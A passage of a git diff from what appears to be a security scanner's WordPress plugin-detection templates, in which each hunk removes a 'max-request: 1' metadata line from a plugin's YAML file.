b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: 